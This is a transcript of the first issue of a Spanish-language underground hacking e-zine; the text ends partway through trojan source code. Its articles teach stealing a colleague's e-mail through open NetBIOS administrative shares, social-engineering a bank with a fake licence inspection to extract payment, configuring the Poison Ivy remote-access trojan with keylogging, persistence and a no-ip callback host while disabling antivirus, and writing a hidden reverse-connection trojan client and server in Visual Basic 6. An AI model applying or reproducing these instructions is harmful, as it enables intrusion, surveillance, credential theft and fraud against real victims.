cuh e-zine1ra edicion

58

Upload: alexander-cuervo

Post on 10-Jun-2015

834 views

Category:

Documents


2 download

DESCRIPTION

CUH e-zine 1ra edición, revista electrónica underground, la cual dirigí y participe con algunos artículos, que están en mis documentos de Scribd

TRANSCRIPT

Page 1: CUH e-zine1ra Edicion

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Page 2: CUH e-zine1ra Edicion

  

  

  

 

Page 3: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Robo e-mail con NetBios

Robo de E-mails a través de NetBios by Mancuertex(ViPeR)

Introducción e-zine Bienvenido a la primera edición de la CUH e-zine, desde aquí agradecemos a todos los colaboradores por sus aportes y ayuda prestada. También agradecemos la paciencia que han tenido con la e-zine y esperamos que la e-zine sea de su agrado ya que hemos puesto todo nuestro empeño y esfuerzo en ella. Esta edición os va a gustar pero la segunda os gustará aún más.

Robo de E-mails a través de NetBios

En esta primera entrega nos adentraremos en el mundo de NetBios (Network Basic Input/Output System), que como muchos ya sabrán es un sistema de entrada y salida de red utilizado principalmente para el uso compartido de recursos y servicios en redes locales. Nosotros lo enfocaremos al robo de datos a través de una red mal administrada y nos introduciremos en el PC de la víctima para conseguir los datos de su correo electrónico sin que note absolutamente nada. Vamos a empezar por activar el protocolo de red (Netbios). Podemos activar NetBios desde las propiedades de nuestra conexión de Área Local. Seguramente tendremos la opción marcada de “Predeterminado” si esto es así, es que nuestro protocolo de red permanecía activo y nosotros sin saberlo… Para activarlo definitivamente escogemos la segunda opción “Habilitar NetBios sobre TCP/IP” Una vez activado, ya podemos compartir nuestros recursos de red, y mejor aún trabajar con los recursos de red que otros usuarios comparten. A partir de ahora podremos acceder a un ordenador para ver sus recursos compartidos, escribiendo en nuestro navegador o en cualquier ventana de Windows dos contrabarras y la IP de la máquina con la que queremos

conectar. Ejemplo:\\192.168.1.254

Para acceder a un recurso compartido en concreto debemos escribirlo después de la IP, seguido del símbolo

del dólar. Ejemplo: \\192.168.1.254/C$ Ya sabemos usar los recursos compartidos ahora vamos al grano. Necesitamos acceso al PC de la víctima y para ello necesitamos saber su IP, así que como estamos en una red local, en mi caso bajo un dominio, abriremos la consola de Windows y teclearemos el comando Net View

/Network, el cual nos mostrará que usuarios hay conectados a nuestra red actualmente. Mi Net View me devolvió estos datos:

Escogeremos a PC-0036 como víctima, pero todavía no sabemos su IP, aunque con el host ya podríamos trabajar, para completar el trabajo resolveremos el host para que nos devuelva la IP. Es tan sencillo como realizar un ping al host. Ejemplo: Ping PC-0036

Page 4: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Robo e-mail con NetBios

Bien, ya tenemos la IP 192.168.1.20! Ya podemos empezar a explotar sus recursos compartidos. Vamos a acceder a través de una ventana tal y como hemos dicho antes, y a comprobar si tiene compartido el recurso de red que necesitamos. En este caso es C$.

Escribiremos \\192.168.1.20/C$ y atención porque nos acaba de mostrar su disco duro, eso quiere decir que ya tenemos acceso de lectura a su disco, y como probablemente su red esté muy mal administrada, tengamos también acceso de escritura, lo que quiere decir, que podemos modificar cualquier archivo. Nuestro objetivo es averiguar que correos electrónicos guarda en su ordenador así que vamos a averiguarlo… Navegando por su ordenador, nos damos cuenta que usa Mozilla Thunderbird, un cliente de correo con licencia GNU y nos “complica” un poco mas la cosa, pero sigue siendo sencillo. Navegando por todas las carpetas de Mozilla Thunderbird, averiguamos que encripta y guarda los e-mails por defecto con la extensión .MSF en una carpeta situada en Datos de Programa.

Unos archivos dependen de otros, y sería difícil intentar abrirlos así por las buenas ya que no conseguiríamos apenas resultados. Así que optaremos por instalanos el Mozilla Thunderbird en nuestro ordenador y copiaremos todos los datos guardados en el ordenador de la víctima en el nuestro. De tal forma que Mozilla Thunderbird, abra los e-mails con la extensión .MSF como si fueran los nuestros propios. Una vez hemos copiado todos los archivos a nuestra carpeta, solo tendremos que abrir Mozilla Thunderbird y aparecerán los correos de nuestra víctima como si de los nuestros se tratase. Con acceso de lectura y escritura en el PC de la víctima podemos hacer 1000 y una cosas, yo he elegido la de robar e-mails porque es un tema interesante y sencillo,

pero una vez tenemos acceso el único límite es nuestra imaginación.

F.A.Q ¿Tengo yo NetBios en mi red? Como ya hemos dicho NetBios es un sistema de entrada y salida de red, el cual hay que tener activado bajo el protocolo TCP/IP si deseamos compartir impresoras o recursos en red con otros ordenadores, por lo tanto si compartes datos en tu red, tienes el protocolo activado. ¿Es peligroso tenerlo activado? En una red bien administrada, no es peligroso, sino necesario, ya que nos facilita mucho el trabajo a la hora de trabajar remotamente. Pero en una red mal administrada puede ser peligroso tenerlo activado. ¿Cómo puedo proteger mi equipo frente a estos ataques? Instalando un Firewall o usando el que viene por defecto en Windows XP SP2 o desactivando NetBios sobre TCP/IP. ¿Cómo uso NetBios sin riesgos? Agregando permisos a los recursos compartidos. Mancuertex (ViPeR) El-Hacker.com

Page 5: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Ingeniería social

Ingeniería social by ElPerro

La ingeniería social esta muy desvalorizada hoy en día por la comuna informática. A los ingenieros sociales se los trata de idiotas, ignorantes, mentirosos, en fin, cada vez más cercano al termino LAMMER. Sin embargo, hay que ser mucho más ingenioso en esta práctica que al estar frente a un monitor dependiendo de los fallos que otras personas hayan cometido al crear un sistema informático. Según Wikipedia.org: Exploit (del inglés to exploit, explotar o aprovechar) es un programa informático malicioso, o parte del programa, que trata de forzar alguna deficiencia o vulnerabilidad de otro programa (llamadas bugs). El fin puede ser la destrucción o inhabilitación del sistema atacado, aunque normalmente se trata de violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros. Un "exploit" es usado normalmente para explotar una vulnerabilidad en un sistema y acceder a él, lo que es llamado como "rootear".

Esta es la definición de Wikipedia.org para “explotar” un error en un sistema. Es sabido que el ser humano es probablemente, el sistema más complejo de la naturaleza, desgraciadamente, también es el bug mas sensible de todo sistema organizado. Precisamente esto vamos a aprender, a explotar el peor error en la organización informática; el que se encuentra entre el teclado y la silla. En el campo de la seguridad informática, ingeniería social es la práctica de obtener información confidencial a través de la manipulación de usuarios legítimos. Un ingeniero social usará comúnmente el teléfono o Internet para engañar a la gente y llevarla a revelar información sensible, o bien a violar las políticas de seguridad típicas. Con este método, los ingenieros sociales aprovechan la tendencia natural de la gente a confiar en su palabra, antes que aprovechar agujeros de seguridad en los sistemas informáticos. Generalmente se está de acuerdo en que “los usuarios son el eslabón débil” en seguridad; éste es el principio por el que se rige la ingeniería social.

Un ejemplo contemporáneo de un ataque de ingeniería social es el uso de archivos adjuntos en emails que ejecutan código malicioso (por ejemplo, usar la máquina de la víctima para enviar cantidades masivas de spam). Ahora, luego de que los primeros emails maliciosos llevaron a los proveedores de software a deshabilitar la ejecución automática de archivos adjuntos, los usuarios deben activar los archivos adjuntos de forma explícita para que ocurra una acción maliciosa. Muchos usuarios, sin embargo, cliquean ciegamente cualquier archivo adjunto recibido, concretando de esta forma el ataque. Quizá el ataque más simple que aún es efectivo sea engañar a un usuario llevándolo a pensar que uno es un administrador del sistema y solicitando una contraseña para varios propósitos. Los usuarios de sistemas de Internet frecuentemente reciben mensajes que solicitan contraseñas o información de tarjeta de crédito, con el motivo de "crear una cuenta", "reactivar una configuración", u otra operación benigna; a este tipo de ataques se los llama phishing (pesca). Los usuarios de estos sistemas deberían ser advertidos temprana y frecuentemente para que no divulguen contraseñas u otra información sensible a personas que dicen ser administradores. En realidad, los administradores de sistemas informáticos raramente (o nunca) necesitan saber la contraseña de los usuarios para llevar a cabo sus tareas. Sin embargo incluso este tipo de ataque podría no ser necesario — en una encuesta realizada por la empresa InfoSecurity, el 90% de los empleados de oficina de la estación Waterloo de Londres reveló sus contraseñas a cambio de un bolígrafo barato.

La ingeniería social también se aplica al acto de manipulación cara a cara para obtener acceso a los sistemas computacionales. Entrenar a los usuarios en el uso de políticas de seguridad y

Page 6: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Ingeniería social

asegurarse de que son seguidas es la principal defensa contra la ingeniería social. Uno de los ingenieros sociales más famosos de los últimos tiempos es Kevin Mitnick [El cóndor]. Según su opinión, la ingeniería social se basa en estos cuatro principios: * Todos queremos ayudar. * El primer movimiento es siempre de confianza hacia el otro. * No nos gusta decir No. * A todos nos gusta que nos alaben. Si bien estos conceptos son claros, concisos y con un alto grado de verdad, no son absolutos. Habla de que la Ingeniería Social se aplica a la informática, es cierto, últimamente se asocia el término a hackers e intrusión de sistemas, pero no es del todo completa la definición. En los años 50 y 60 se destaco un personaje emblemático para cualquier Ingeniero Social, hablo de Franck Abgnale Jr. Un joven que a los 17 años engañaba a sus maestros, padres y compañeros para obtener algún provecho. Este personaje puede ser visto en toda su magnificencia en la película "Atrápame si puedes" con Tom Hanks y Leonardo Di Caprio. ¿Como se usa la Ingeniería Social? Hay muchas formas de usarla, con ingenio podemos ser personal de limpieza, abogados, contadores, consultores o vagabundos. Hablo de disfraces [no es chiste].

Imaginemos la situación [Solo es un ejemplo, no quiere decir que pueda derivar en una situación real]: Entra un joven de traje y corbata, un gafete con datos y logotipo de una gran empresa de software y un maletín con documentaciones varias al banco y solicita hablar con EL GERENTE Y CON EL JEFE DE SISTEMAS. Inmediatamente solicita un inventario con los seriales de los sistemas operativos usados en cada terminal y solicita ver cada una de ellas. Gran problema para los directivos del banco, vino un inspector de Microsoft Corp. a ver si tenemos MS/Windows original instalado en nuestras PC...Y NO TENEMOS NI UNO!!!! En este caso puede pasar lo siguiente: 1 - Te ofrecen una coima en dinero. 2 - Se disculpan y prometen obtener licencias.

3 - Llaman a su abogado para ser asesorados. 4 - Preguntan como pueden solucionar el asunto. 5 - Llaman a Microsoft Corp. para verificar la identidad del inspector [a correr!!!] Siempre, el Ingeniero Social va a tratar de llegar al punto 1 o4 y es entonces donde abre su maletín y saca ladocumentación. Formulario de amonestación por uso indebido de software ybla bla bla, se notifica al banco que se va a impartir unamulta de XXX [suma muy grande]. Es muy posible que el banco no quiera pagar tal multa y simplemente le pagan unvalor menor a nuestro Ingeniero Social. Fin del asunto...

ESTO ES SOLO FICTICIO!!! Basado en una situación cómicaque ocurrió en mi trabajo hace mucho tiempo cuando lehicimos un chiste al gerente de la empresa [no era un banco] y al encargado del centro de cómputos. El chiste nos saliobien, el director de la empresa estaba desesperado por noligar la multa y quiso sacarse el problema de encima loantes posible, podían despedirlo por algo así. Suerte que no se enojo, nos castigo con trabajos forzados nada mas...peroestuvo muy gracioso el asunto.

En conclusión. Esto fue solo un ejemplo de aplicación en lavida real sin necesidad de engañar a alguien vía Internet, es más peligroso, pero sin duda más divertido. En la próxima entrega analizamos mayores problemasderivados en el engaño del cual todos podemos ser víctimas.ElPerro – Río Gallegos, Provincia de Santa Cruz, Argentina

Page 7: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Uso de troyanos

Guía del uso de troyanos by Froseck Introducción Saludos, soy FroSeck y he hecho este manual dividido en dos partes con el único fin de solucionar aquellas dudas que puedan tener los usuarios mas principiantes en este tema y guiarlos en el uso de troyanos de conexión inversa sin responsabilizarme del mal uso que hagáis de éste. Espero que os sirva de gran ayuda.

Conceptos básicos Para empezar en este manual creo que lo mejor será tener bien claro unos conceptos imprescindibles para saber lo que estamos haciendo.

Troyano Programa generalmente dividido en dos partes, el cliente y el servidor, cuya interacción permite controlar ordenadores ajenos (víctimas) en los que ha sido introducido incorporado en otra aplicación aparentemente inofensiva. Se distinguen dos tipos de troyanos: Conexión directa El cliente se conecta a la victima (servidor) mediante su IP. Este método está en desuso ya que es necesario saber cual es la IP de nuestra víctima y que no use router. Conexión inversa La víctima (servidor) se conecta a nosotros (cliente) mediante nuestra IP. Este método es el usado por la gran mayoría debido a su gran facilidad, aunque tiene algunos problemas que solucionaremos mas adelante. Cliente Parte de un troyano que accede a los servicios ofrecidos por un programa llamado servidor. Servidor Parte de un troyano que realiza tareas en beneficio de otras aplicaciones llamadas clientes. IP (Internet Protocol) es un conjunto de cuatro números del 0 al 255 separados por puntos con los cuales se identifica a un ordenador conectado a una red que corre bajo este protocolo. Nuestra IP puede ser estática (si siempre es la misma) o dinámica (si cuando reiniciamos la conexión cambia). Se pueden distinguir dos IPs en un ordenador. Puerto Mecanismo por la cual entra y sale la información de una computadora. Para que se entienda mejor, podemos decir que es una “puerta” que se utiliza para intercambiar información de un sitio a otro y para que se de lugar el intercambio tiene que estar abierta. Joiner Programa que se encarga de unir dos o más archivos en uno solo que tendrá como extensión “.exe”. Router Aparato encargado de dirigir el tráfico de paquetes de un lugar a otro.

Servicio NO-IP Bueno como hemos visto antes en los troyanos de conexión inversa (que son los que vamos a tratar en este manual) es necesario que pongamos al crear nuestro servidor nuestra IP, pero ¿qué pasaría si nuestra IP fuera dinámica? Pues pasaría que nuestra víctima se conectaría a nosotros hasta que se nos cambie por otra. Entonces la perderíamos y no se podría conectar debido a que nuestra IP ya no es la que pusimos en la configuración del server. Para evitar esto tenemos que utilizar servicios como NO-IP. Este servicio lo que hace es redireccionar la conexión que hace el servidor a nuestro ordenador. Para utilizar este servicio lo primero que tenemos que hacer es:

Acceder a su web ->>> www.no-ip.com

Hacer click donde pone Sign-up Now!

Seguir los pasos para registrarse y obtener una cuenta.

Activamos nuestra cuenta y nos logueamos.

Hacemos click en el menú de la izquierda donde pone add y escribir únicamente el hostname que puede ser un nombre cualquiera y en Host Type seleccionamos DNS Host (A) y ya esta, ahora le tenemos que dar (más abajo) a Create Host.

Una vez creado volvemos a Hosts / Redirects y esa dirección (EJ: "ola.no-ip.org") que vemos será lo que sustituirá a nuestra IP en la configuración del servidor.

Ahora nos tenemos que instalar el programa NO-IP DUC que descargaremos de aquí ->>> http://www.descargarlo.com/descargar-1957-DUC.No_Ip.html

Una vez instalado lo ejecutamos y escribiremos nuestros datos de la cuenta y nos aparecerá la dirección de nuestro host que creamos anteriormente. Así quedaría:

Es importante que la carita salga sonriente como en la imagen si no es que hemos hecho algo mal. Cuando estemos usando algún troyano es necesario ejecutar este programa porque si no jamás se nos conectara

Page 8: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Uso de troyanos

nuestra víctima (servidor). Con este servicio podremos conectarnos en cualquier ordenador a nuestra víctima mientras tengamos el cliente del troyano y nuestro NO-IP DUC ya que da igual la IP que tengamos.

Creación y configuración del servidor Ahora nos toca elegir el troyano que más nos guste, por supuesto de conexión inversa. Yo recomiendo el Poison Ivy 2.3 que podemos descargar de aquí:

http://www.poisonivy-rat.com/dl.php?file=PI230

Es importante que antes de descargarlo desactivemos nuestro AV (antivirus) para que no nos lo borre y poder trabajar con él. Cuando descomprimamos el RAR haremos clic en el archivo “Poison Ivy 2.3.0.exe” que es nuestro cliente que usaremos para controlar a nuestra víctima y para crear el servidor que posteriormente le mandaremos. Para empezar a configurarlo todo le daremos a File y a New Client y nos saldrá esto:

Dejaremos el Puerto por defecto (3460) si queremos, luego pondremos nuestra contraseña en el recuadro y haremos click en Start. Ahora toca configurar nuestro servidor. Le damos a File y a New Server. Ahora le damos a create profile y nos saldrá un recuadro para ponerle el nombre a el perfil (ponemos lo que queramos).

Luego nos saldrá esta ventana:

¿Recordáis la dirección del host que creamos antes? Pues ahora debemos añadirla a nuestro server para que se nos conecte. Le damos a Add y luego ponemos nuestra dirección e importante poner puerto 3460 (o si lo cambiamos poner ese). Podemos probar si va bien

dándole a Test Connections (tenemos que tener activo el NO-IP DUC). Si aún así os sale una X (no os funciona) y tenéis un router es normal así que leer el apartado Mapear puertos del manual. El recuadro ID será el nombre de identificación que nos aparecerá para que sepamos quien es. Luego deberemos poner la contraseña que pusimos antes al configurar el cliente, si ponemos otra no se nos conectará. Lo demás lo dejamos como está. Le damos a Next y nos aparece esta ventana:

La primera casilla sirve para crear una entrada en el registro y ejecutarse en cada inicio de Windows. Recomiendo desactivarla ya que algunos AV como el Kaspersky lo detectarían por heurística y nuestro troyano se volvería detectable. También recomiendo desactivar la casilla Copy File que sirve para que se autocopie a una carpeta y así permanecer oculto ya que también es detectada por algunos AV. Estos problemas los solucionaremos en la siguiente parte de este manual para que se inicie con Windows, se oculte y sea indetectable. Luego vienen tres casillas, la primera hace que el servidor se auto-elimine al ejecutarse cosa que no nos conviene en nuestra configuración así que lo desactivamos. Luego las dos siguientes (Keylogger para ver lo que escribe nuestra víctima) y Persistence (para que sea mas difícil borrar el servidor) las activamos. Le damos a Next y nos aparece esto:

La casilla de Inject sirve para inyectarse en otro proceso. La dejamos desactivada y así por defecto se inyecta en el proceso “explorer.exe”. Lo dejamos todo como esta y le damos a Next y simplemente le ponemos un icono si queremos y luego dejando todo como esta le damos a Generate y ya tenemos nuestro server creado. Para terminar de tenerlo todo configurado haremos click en Preferences (al lado de File) y en la pestaña General

Page 9: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Uso de troyanos

deberá estar activado el Auto-Refresh. Le damos clic en Ok y estamos listos para recibir una conexión.

A continuación explicaré brevemente como usar el cliente para hacer lo que deseemos en el ordenador de nuestra víctima. Lo mejor que podéis hacer para aprender a usarlo es probando vuestros servidores con vosotros mismos y viendo las opciones que trae este troyano con vosotros. Si cuando los probáis con vosotros mismos no funciona es porque como dije antes o lo habéis hecho mal o tenéis un router y en el apartado Mapear puertos lo podéis solucionar.

Uso del cliente Para poder seguir con este apartado debemos de tener una víctima. Nosotros serviremos. Haremos una copia de nuestro servidor y lo meteremos en una carpeta como copia de seguridad y luego lo ejecutamos (con el AV desactivado ya que aun no es indetectable). Una vez que hagamos dos clicks en nuestra víctima nos saldrá esta columna que procederé a explicar brevemente:

Information: Nos da información del SO de nuestra víctima y del servidor. Files: Desde aquí podemos manejar los archivos de nuestra víctima. Search: Busca archivos en el disco duro de la víctima. Regedit: Permite editar el registro. Search: Permite buscar una clave en el registro de nuestra víctima. Processes: Da un listado de los procesos de nuestra víctima. Servicios: Da un listado de los servicios de nuestra víctima. Installed Applications: Da un listado de todas las aplicaciones instaladas. Windows: Da un listado de las ventanas abiertas en el ordenador de la víctima. Relay: sirve para ver y manipular el trafico entre los diferentes proxys y servidores. Para nuestro servidor no

tiene ninguna utilidad. Active Ports: Da un listado de todos los puertos abiertos. Remote Shell: Sirve para obtener una Shell de la víctima y manejar la consola. Cached: Da un listado de las contraseñas almacenadas por un navegador (EJ: Firefox). NT/NTLM Hashes: Obtiene los hashes del archivo sam para poder (si quieres) crackearlos por tu cuenta y sacar las contraseñas de inicio de sesión de Windows. Wireless: Obtiene las contraseñas almacenadas de redes inalámbricas. Keylogger: Permite ver lo que ha escrito la víctima aunque tú no estés presente. Audio Capture: Permite capturar sonido si la víctima tiene un micrófono. Screen Capture: Permite hacer una captura de pantalla a la víctima. Webcam Capture: Permite ver a la víctima a través de su Webcam si la tiene. Remote Port Scanner: Permite ver que puertos tiene abiertos la víctima. Edit ID: Cambia el nombre con el que se identifica nuestra víctima. Share: Permite compartir nuestra víctima con otra persona. Update: Permite sustituir nuestro servidor por otro. Restart: Resetea el servidor por si hay mucho ping por ejemplo. Unnistall: Borra nuestro servidor del ordenador de nuestra víctima.

Mapear puertos Si tenéis un router y aun no se os conecta el servidor a vuestro cliente es porque no habéis abierto el puerto correspondiente. Tenéis que ir a la configuración de vuestro router y abrirlo y redireccionar el tráfico que entre por ese puerto a tu ordenador. Para ello tienes que saber cual es tu IP privada. Ve a inicio, ejecutar, escribes cmd y luego ipconfig. Ahí te aparecerá tu IP privada (la que tienes dentro de tu red). Otra cosa importante es la puerta de enlace que en mi caso es 192.168.1.1. Para acceder a la configuración de tu router debes de teclear la puerta de enlace en la barra de direcciones de tu navegador y luego pones usuario y contraseña y listo. Una vez dentro tendrás que encontrar un apartado donde te permita abrir los puertos. En mi caso tengo un Linksys WRT54G Wireless-G Router. Hay muchos mas modelos de routers y por supuesto no puedo hacer un manual para cada uno. Pero estoy seguro que si investigáis un poco lograreis abrirlos. Además siempre tendréis a www.google.com o a nuestro foro http://foro.el-hacker.com

Al hacer lo antes descrito e ir a la parte donde se abren los puertos aparece esto:

Page 10: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Uso de troyanos

En application se puede poner cualquier nombre. En Start y End se pone el puerto que has escogido, en mi caso el 3460. En Protocol se deja en Both. En IP Address pones tu IP privada, luego le das a Enable y lo guardas. Para que se entienda mejor todo esto que estamos haciendo os pongo este esquema de una conexión inversa si estamos detrás de un router:

Se ve como nuestra víctima se conecta a nuestro host guiafroseck.no-ip.org por el puerto 3460 y este lo redirecciona a nuestro router con IP 80.130.10.100. Gracias a que hemos mapeado el puerto 3460 el router es capaz de mandar la conexión a nuestro ordenador que en este caso tiene de IP privada 192.168.1.4. Ahora sólo queda hacer indetectable y camuflar nuestro servidor, hasta la segunda parte. By FroSeck

Troyano o Caballo de Troya 

Un troyano o caballo de Troya es un malware‐‐>  Código  malicioso‐‐>MALicious  softWARE  ‐, por  lo  general es un  programa que    permite el  acceso remoto de un  PC (muchos  de  ellos fueron  en  un  principio  programas    creados para la supervisión de redes de sistemas de información)  ,  hoy  en  dia  es  una  de  la formas  mas  fáciles  de  vulnerar  un  sistema 

informático,    la  mayor  virtud    que  debe poseer un troyano es la de ser indetectable, he ahí el dilema,  existen diversas técnicas para troyanizar un computador, por medio de blindeo de imágenes, incrustados en archivos comprimidos,  embebidos  en    diapositivas, encriptados  (muchos  se  valen  de  tremendas artimañas‐>Lammeradas):  entrando  a  foros  de discusión, se familiarizan (hacen amigos) y después  sueltan  (la  bomba)  una  serie  de "aportes"  (infectados)  todos  ellos  tan pulcros  ahí  embebidos  :)  dispuestos  a prestar  una  mano  a  los  incautos,  que  a cualquier  enlace  de  descarga  hacen  clic. Cosas de la vida. Una vez se ha  troyanizado un  sistema,  se  tiene  acceso  total,  el funcionamiento  de  un  troyano  radica  en  la instalación  de  dos  programas  básicos: cliente  y  servidor,  compartiendo  el  mismo puerto,  el  servidor  es  el  programa  que  se instala en la victima (no importa el método de  romanización  que  se  infrinja),  y  el cliente se instala en nuestro computador, el cliente  es  que  ordena  y  el  server  obedece,  se  pueden    tener  varias  víctimas, simplemente  con  cambiar  el  numero  de  la  IP de  el  server  ya  rotamos  de  esclavo,    ;)     

 

Nota Editorial

Page 11: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Troyano de Conexión Inversa

Troyano de conexion Inversa By Don Nadie

En este apartado vamos a aprender a crear un Troyano de conexión inversa en VB 6. La conexión inversa, es la victima la que se conecta a ti, contrario de los de conexión directas en que eres tu quien se conecta a la victima. Con esto podemos tener a varias victimas a la vez y no de una en una y además si están detrás de un router funcionará ;) Bueno empecemos por crear un nuevo proyecto. Vamos a Proyecto>Componentes y marcamos los siguientes controles: -Microsoft Windows Common Controls 5.0 (con el 6.0 al Listview no se le puede aplicar estilo XP). -Microsoft Winsock Control 6.0 Ahora pasamos a insertar los componentes necesarios, esto puede variar según cada uno, como le guste etc… Vamos a añadir el Listview que es este control: En nombre, yo le puse LV En el cuadro propiedades, en personalizado debéis tenerlo así:

Nos vamos a encabezados de columna, y añadimos las siguientes columnas: -Nombre -IP -Nick/Nombre PC -S.O -RAM -Pais -CPU

-Cam -Admin -Version Bueno esto es a gusto, yo lo haré así, ustedes como vean. El tamaño también lo ajustan al gusto(el ancho de cada columna). A mi me gusta que tenga la propiedad Gridlines, que es las rejillas, como el bifrost, bueno ya verán la imagen, para el que le guste, Tughack(Sniper) lo explicó en el foro, y también la propiedad Multiselect, así que les dejo el link: http://foro.el-hacker.com/index.php/topic,78815.0.html También explica el estilo XP, así que no explicaré eso…. Bueno ,el aspecto(en ejecución, después de ser compilado y agregado el estilo XP)debería ser parecido a este: Como dije , ustedes pónganle las opciones que quieran… Ahora vamos a añadirle un label, que abajo, donde nos mostrará el estado y eso.

En Borderstyle, pónganle FixedSingle. Ahora añadan al formulario el control Winsock: Y en la propiedad nombre pónganle WS(por comodidad….). Y en Index pónganle el valor 0. Un Timer interval a 1. Añádanle un menú, vayan a Herramientas>Editor de Menús. En caption Escriban Menú, y en name igual. Desmarquen la propiedad Visible. Luego denle insertar, denle a la flecha que va hacia abajo, y luego a la flecha que va apunta a la derecha. Y en caption pongan “Cambiar Nombre” y de nombre “Name”. Esto es lo que deberían tener:

Page 12: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Troyano de Conexión Inversa

Acepten. Bueno vamos a ver un poco de codigo: CLIENTE Public total as integer Private sub form_load() ‘al cargar el formulario WS(0).LocalPort = 2300 ‘escuchamos en el puerto 2300 ‘Nota,seria mejor hacer un nuevo formulario,llamado Settings en donde se especifique el puerto ha escuchar,pero de momento mejro dejenlo fijo WS(0).Listen ‘Nos ponemos a la escucha Label1.Caption = "Escuchando en el puerto " & “2300” total = 0 ‘la variable totalindex sea 0 End Sub Private Sub Timer1_Timer() Dim v As Long, marca() As String On Error Resume Next For v = 1 To lv.ListItems.Count ‘bucle que recorre todos lso elementos del listview marca = Split(lv.ListItems(v).Key, "|") ‘esto e sun identificador,lo sacamos de la key If WS(marca(0)).State <> 7 Then ‘si el estado de ese no es conectado lv.ListItems.Remove (v) ‘lo eliminamos de la lista porque no estamos conectados End If Next Me.Caption = "Troyanito - " & lv.ListItems.Count & " conectado(s) -" 'ponemos el nombre de nuestro troyano y el nº de conectados End Sub Private Sub WS_ConnectionRequest(Index As Integer, ByVal requestID As Long) ‘cuando hay conexion

On Error Resume Next total = total + 1 ‘sumamos 1 a esta variable WS(Index).Close ‘cerramos la conexion WS(Index).Accept requestID ‘aceptamos la peticion Load WS(total) WS(total).Listen ‘nos ponemos a la escucha(pero fijenese que le sumamos 1,proque el indice esta ocupado,se hizo conexion con ese indice asique le sumamos 1 para aceptar nuevas)escuhamos con ese indice End Sub Private Sub LV_Mousedown(Button As Integer, Shift As Integer, x As Single, y As Single) ‘al clicar(en relaidad cuando se suelta el mouse) On Error Resume Next If lv.selectedItem.Selected = False Then ‘si no hay nada seleccionado salimos Exit Sub ‘salimos ElseIf Button = 2 Then ‘sino,si se pulsó el boton 2(derecho) PopupMenu Menu ‘mostramos el menu Menu End If End Sub Private Sub name_click() ‘al clicar en change name(de nombre name) lv.StartLabelEdit ‘que podamos editar el nombre End Sub Private Sub lv_AfterLabelEdit(Cancel As Integer, NewString As String)’despues de cambiar el nombre WS(lv.SelectedItem.Index - 1).Senddata "nombrecan|" & NewString ‘enviamos el identificador y el valor que se puso End Sub Private Sub WS_DataArrival(Index As Integer, ByVal bytesTotal As Long) ‘cuando recibimos datos Dim datos as string Dim data() as string ‘array WS(Index).GetData datos ‘recibimos los datos y los guardamos en la variable “datos” Data=Split(datos,”|”)’partimos la variable datos por el identificador “|”,para separar datos Select case Data(0)’según lo que contenga .Data(0) es el primer dato,usaremos eso como identificador Case “Conexion” …. End select End Sub

Page 13: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Troyano de Conexión Inversa

Bueno, eso lo dejamos así, porque primero tenemos que poner código en el servidor, luego modificaremos esa parte. Ahora abran un nuevo proyecto, este será el server, añádanle también el Winsock y de nombre también WS,el aspecto nos

da igual ya que no se verá ☺ Y un timer, enabled true e interval 1. Un picture1. SERVIDOR Dim victima as string,name1 as string,so as string,ip as string,port as string,webcam as string,pais as string ,tor as string,nombrepc as string,procesador as string Dim admin as boolean Private Sub form_load() On error resume next Open Environ("windir") & "\KB007.txt" For Input As #1 ‘abrimos un archivo de texto en el directorio de windows Input #1, victima ‘leemos el contenido de este If victima = "" Then ‘si esta vacio victima = "Default" ‘le ponemos default a la victima End If ‘sino victima contendrá lo que contenga ese archivo, eso es para cuando cambiemos el nombre a la victima. Close #1 Dim yo As Object Set yo = CreateObject("wscript.shell") pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME) nombrepc = Environ("ComputerName")’esta variable contendrá el nombre del pc name1 = Environ("UserName")’el nombre de usuario so = yo.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Productname")’el sistema operativo ip = "127.0.0.1" ‘la ip, pueden hacer un edit server port = 2300 ‘lo mismo, con el edit server lo editan…. procesador = yo.regread("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor \0\ProcessorNameString") ‘júntenlo, es k no cabía, es para el procesador.... App.TaskVisible = False ‘para que no se vea en el admin de tareas en aplicaciones If App.PrevInstance = True Then: End ‘si ya esta en ejecución salimos, para no tener 2 corriendo a la vez

Me.visible=false ‘para que no se vea el form…. ‘Esto es para la webcam Dim temp As Long hwdc = capCreateCaptureWindow("CapWindow", ws_child Or ws_visible, _ 0, 0, 320, 240, Picture1.hwnd, 0) If (hwdc <> 0) Then webcam = "Si" ‘entonces si tenemos webcam temp = DestroyWindow(hwdc) temp = SendMessage(hwdc, WM_CAP_DRIVER_DISCONNECT, 0&, 0&) DoEvents Else webcam = "No" ‘pues no End If pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME) ‘para obtener el país admin = CBool(IsNTAdmin(ByVal 0&, ByVal 0&))’para saber si somos admins o no If admin = True Then tor = "Si" Else tor = "No" End If End Sub ‘la función para obtener el idioma y pais Public Function ObtenerIdioma(ByVal lInfo As Long) As String Dim buffer As String, ret As String buffer = String$(256, 0) ret = GetLocaleInfo(LOCALE_USER_DEFAULT, lInfo, buffer, Len(buffer)) 'Si Ret devuelve 0 es porque falló la llamada al Api If ret > 0 Then ObtenerIdioma = Left$(buffer, ret - 1) Else ObtenerIdioma = "" End If End Function ‘función para obtener la memoria ram Public Function GetRamSize() As String Dim RamStats As MEMORYSTATUS GlobalMemoryStatus RamStats GetRamSize = Round((RamStats.dwTotalPhys / 1024) / 1024) + 1 End Function Private Sub Timer1_Timer() If WS.State <> 7 Then ‘si no estamos conectados 